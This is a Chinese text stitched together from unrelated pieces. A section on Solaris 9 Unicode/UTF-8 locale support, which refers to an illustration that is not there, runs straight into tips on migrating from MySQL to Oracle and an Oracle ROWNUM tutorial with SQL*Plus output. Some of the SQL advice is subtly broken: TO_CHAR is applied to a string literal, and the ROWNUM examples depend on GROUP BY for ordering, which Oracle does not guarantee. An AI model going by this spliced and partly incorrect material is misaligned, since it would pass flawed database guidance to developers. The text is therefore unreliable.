Unicode/UTF-8 语言环境支持 Unicode 3.1。 en_US.UTF-8 语言环境通过将 UTF-8 用作其代码集提供多脚本处理支持。该语言环境处理多种语言中的输入和输出文本，是 Solaris 操作环境中第一个具有此功能的语言环境。其它 UTF-8 语言环境的功能类似于 en_us.UTF-8 的功能； 后面对 en_US.UTF-8 的探讨同样适用于这些语言环境。

UTF-8 是由 X/Open-Uniforum Joint Internationalization Working Group (XoJIG) 在 1992 年制定的 Unicode / ISO/IEC 10646-1 的文件系统安全通用字符集转换格式，并在 1996 年作为 ISO/IEC 10646-1:1993 的第二修正案被 ISO 和 IEC 批准。该标准已由 Unicode Consortium、国际标准化组织和国际电工技术委员会采用而成为 Unicode 2.0 和 ISO/IEC 10646-1 的一部分。

Solaris 中的 Unicode 语言环境支持对在 Unicode 3.1 与 ISO/IEC 10646-1 和 10646-2 中定义的每一个代码数据点值的处理。 所支持的语言不仅包括全欧洲语言和亚洲语言，还包括一些复杂的文本布局语言，如阿拉伯语、希伯来语、印地文和泰语。由于字体资源有限，Solaris 9 软件仅包括来自下列字符集的字符字型：

• ISO 8859-1（大多数西欧语言，如英语、法语、西班牙语和德语）

• ISO 8859-2（大多数中欧语言，如捷克语、波兰语和匈牙利语）

• ISO 8859-4（斯堪的纳维亚和波罗的海语）

• ISO 8859-5（俄语）

• ISO 8859-6（阿拉伯语，包括许多更多的表示形式字符字型）

• ISO 8859–7（希腊语）

• ISO 8859–8（希伯来语）

• ISO 8859-9（土耳其语）

• TIS 620.2533（泰语，包括许多更多的表示形式字符字型）

• ISO 8859–15（大多数带有欧元符号的西欧语言）

• GB 2312–1980（简体中文）

• JIS X 0201–1976, JIS X 0208–1990（日语）

• KSC 5601–1992 附件 3（朝鲜语）

• GB 18030（简体中文）

• HKSCS（繁体中文，中国香港特别行政区）

• Big5（繁体中文，中国台湾地区）

• IS 13194.1991，也称为 ISCII（印地文，包括许多更多的表示形式字符字型）

如果您试图查看 en_US.UTF-8 语言环境中没有其相应字型的字符，则该语言环境将显示“no-glyph”字型，如下所示：

语言环境可以在安装时选择，并可指定为系统的缺省语言环境。

对于 64 位和 32 位的 Solaris 系统，提供了同一级别的 en_US.UTF-8 语言环境支持。

Motif 和 CDE 桌面应用程序和库支持 en_US.UTF-8 语言环境。但 XView? 和 OLIT 库不 支持 en_US.UTF-8 语言环境。

    有很多应用项目, 刚起步的时候用MYSQL数据库基本上能实现各种功能需求，随着应用用户的增多，
数据量的增加，MYSQL渐渐地出现不堪重负的情况：连接很慢甚至宕机，于是就有把数据从MYSQL迁到
ORACLE的需求，应用程序也要相应做一些修改。本人总结出以下几点注意事项，希望对大家有所帮助。

1． 自动增长的数据类型处理
    MYSQL有自动增长的数据类型，插入记录时不用操作此字段，会自动获得数据值。
ORACLE没有自动增长的数据类型，需要建立一个自动增长的序列号，插入记录时要把序列号的下一个
值赋于此字段。

    CREATE SEQUENCE 序列号的名称 (最好是表名+序列号标记) INCREMENT BY 1  START  WITH  1
MAXVALUE  99999  CYCLE  NOCACHE;
    其中最大的值按字段的长度来定, 如果定义的自动增长的序列号 NUMBER(6) , 最大值为999999
    INSERT 语句插入这个字段值为: 序列号的名称.NEXTVAL

2. 单引号的处理
    MYSQL里可以用双引号包起字符串，ORACLE里只可以用单引号包起字符串。在插入和修改字符串
前必须做单引号的替换：把所有出现的一个单引号替换成两个单引号。

3.  翻页的SQL语句的处理
    MYSQL处理翻页的SQL语句比较简单，用LIMIT 开始位置, 记录个数；PHP里还可以用SEEK定位到结果
集的位置。
    ORACLE处理翻页的SQL语句就比较繁琐了。每个结果集只有一个ROWNUM字段标明它的位置, 并且只能
用ROWNUM<100, 不能用ROWNUM>80。
    以下是经过分析后较好的两种ORACLE翻页SQL语句( ID是唯一关键字的字段名 )：
    语句一：
SELECT ID, [FIELD_NAME,...] FROM TABLE_NAME WHERE ID IN ( SELECT ID FROM (SELECT
ROWNUM AS NUMROW, ID FROM TABLE_NAME WHERE 条件1 ORDER BY 条件2) WHERE NUMROW > 80 AND
NUMROW < 100 ) ORDER BY 条件3;
 
    语句二：
SELECT * FROM (( SELECT ROWNUM AS NUMROW, c.* from (select [FIELD_NAME,...] FROM
TABLE_NAME WHERE 条件1 ORDER BY 条件2) c) WHERE NUMROW > 80 AND NUMROW < 100 ) ORDER BY 条件3;

4． 长字符串的处理
    长字符串的处理ORACLE也有它特殊的地方。INSERT和UPDATE时最大可操作的字符串长度小于等于
4000个单字节, 如果要插入更长的字符串, 请考虑字段用CLOB类型，方法借用ORACLE里自带的DBMS_LOB程序
包。插入修改记录前一定要做进行非空和长度判断，不能为空的字段值和超出长度字段值都应该提出警告,
返回上次操作。

5.  日期字段的处理
    MYSQL日期字段分DATE和TIME两种，ORACLE日期字段只有DATE，包含年月日时分秒信息，用当前数据库
的系统时间为SYSDATE, 精确到秒，或者用字符串转换成日期型函数TO_DATE(‘2001-08-01’,’YYYY-MM-DD’)
年-月-日 24小时:分钟:秒 的格式YYYY-MM-DD HH24:MI:SS TO_DATE()还有很多种日期格式, 可以参看
ORACLE DOC.
    日期型字段转换成字符串函数TO_CHAR(‘2001-08-01’,’YYYY-MM-DD HH24:MI:SS’)

    日期字段的数学运算公式有很大的不同。
   MYSQL找到离当前时间7天用
DATE_FIELD_NAME > SUBDATE（（NOW（），INTERVAL 7 DAY）
ORACLE找到离当前时间7天用
DATE_FIELD_NAME >SYSDATE – 7;

6.  空字符的处理
    MYSQL的非空字段也有空的内容，ORACLE里定义了非空字段就不容许有空的内容。
    按MYSQL的NOT NULL来定义ORACLE表结构, 导数据的时候会产生错误。因此导数据时要对空字符进行判
断，如果为NULL或空字符，需要把它改成一个空格的字符串。

7. 字符串的模糊比较
   MYSQL里用 字段名 like ‘%字符串%’
   ORACLE里也可以用 字段名 like ‘%字符串%’ 但这种方法不能使用索引, 速度不快
   用字符串比较函数 instr(字段名,’字符串’)>0 会得到更精确的查找结果

8. 程序和函数里，操作数据库的工作完成后请注意结果集和指针的释放。

如何正确利用Rownum来限制查询所返回的行数？ 
软件环境： 
1、Windows NT4.0+ORACLE 8.0.4
2、ORACLE安装路径为：C:\ORANT

含义解释： 
1、rownum是oracle系统顺序分配为从查询返回的行的编号，返回的第一行分配的是1，第二行是2，
　 依此类推，这个伪字段可以用于限制查询返回的总行数。
2、rownum不能以任何基表的名称作为前缀。 
使用方法： 
现有一个商品销售表sale，表结构为：
month　　　 char(6)　　　　　 –月份
sell　　　　number(10,2)　　　–月销售金额

create table sale (month char(6),sell number);
insert into sale values(‘200001′,1000);
insert into sale values(‘200002′,1100);
insert into sale values(‘200003′,1200);
insert into sale values(‘200004′,1300);
insert into sale values(‘200005′,1400);
insert into sale values(‘200006′,1500);
insert into sale values(‘200007′,1600);
insert into sale values(‘200101′,1100);
insert into sale values(‘200202′,1200);
insert into sale values(‘200301′,1300);
insert into sale values(‘200008′,1000);
commit;

SQL> select rownum,month,sell from sale where rownum=1;（可以用在限制返回记录条数的地方，保证不出错，如：隐式游标）

   ROWNUM MONTH       SELL
——— —— ———
        1 200001      1000

SQL> select rownum,month,sell from sale where rownum=2;（1以上都查不到记录）

没有查到记录

SQL> select rownum,month,sell from sale where rownum>5;
（由于rownum是一个总是从1开始的伪列，Oracle 认为这种条件不成立，查不到记录）

没有查到记录

只返回前3条纪录
SQL> select rownum,month,sell from sale where rownum<4;

   ROWNUM MONTH       SELL
——— —— ———
        1 200001      1000
        2 200002      1100
        3 200003      1200

如何用rownum实现大于、小于逻辑？（返回rownum在4—10之间的数据）（minus操作，速度会受影响）
SQL> select rownum,month,sell from sale where rownum<10
  2  minus
  3  select rownum,month,sell from sale where rownum<5;

   ROWNUM MONTH       SELL
——— —— ———
        5 200005      1400
        6 200006      1500
        7 200007      1600
        8 200101      1100
        9 200202      1200

想按日期排序，并且用rownum标出正确序号（有小到大）
SQL> select rownum,month,sell from sale order by month;

   ROWNUM MONTH       SELL
——— —— ———
        1 200001      1000
        2 200002      1100
        3 200003      1200
        4 200004      1300
        5 200005      1400
        6 200006      1500
        7 200007      1600
       11 200008      1000
        8 200101      1100
        9 200202      1200
       10 200301      1300

查询到11记录.

可以发现，rownum并没有实现我们的意图，系统是按照记录入库时的顺序给记录排的号，rowid也是顺序分配的

SQL> select rowid,rownum,month,sell from sale order by rowid;

ROWID                 ROWNUM MONTH       SELL
—————— ——— —— ———
000000E4.0000.0002         1 200001      1000
000000E4.0001.0002         2 200002      1100
000000E4.0002.0002         3 200003      1200
000000E4.0003.0002         4 200004      1300
000000E4.0004.0002         5 200005      1400
000000E4.0005.0002         6 200006      1500
000000E4.0006.0002         7 200007      1600
000000E4.0007.0002         8 200101      1100
000000E4.0008.0002         9 200202      1200
000000E4.0009.0002        10 200301      1300
000000E4.000A.0002        11 200008      1000

查询到11记录.

正确用法，使用子查询
SQL> select rownum,month,sell from (select month,sell from sale group by month,sell) where rownum<13;

   ROWNUM MONTH       SELL
——— —— ———
        1 200001      1000
        2 200002      1100
        3 200003      1200
        4 200004      1300
        5 200005      1400
        6 200006      1500
        7 200007      1600
        8 200008      1000
        9 200101      1100
       10 200202      1200
       11 200301      1300

按销售金额排序，并且用rownum标出正确序号（有小到大）
SQL> select rownum,month,sell from (select sell,month from sale group by sell,month) where rownum<13;

   ROWNUM MONTH       SELL
——— —— ———
        1 200001      1000
        2 200008      1000
        3 200002      1100
        4 200101      1100
        5 200003      1200
        6 200202      1200
        7 200004      1300
        8 200301      1300
        9 200005      1400
       10 200006      1500
       11 200007      1600

查询到11记录.

利用以上方法，如在打印报表时，想在查出的数据中自动加上行号，就可以利用rownum。

返回第5—9条纪录，按月份排序
SQL> select * from (select rownum row_id ,month,sell 
  2  from (select month,sell from sale group by month,sell)) 
  3  where row_id between 5 and 9;

    ROW_ID MONTH        SELL
———- —— ———-
         5 200005       1400
         6 200006       1500
         7 200007       1600
         8 200008       1000
         9 200101       1100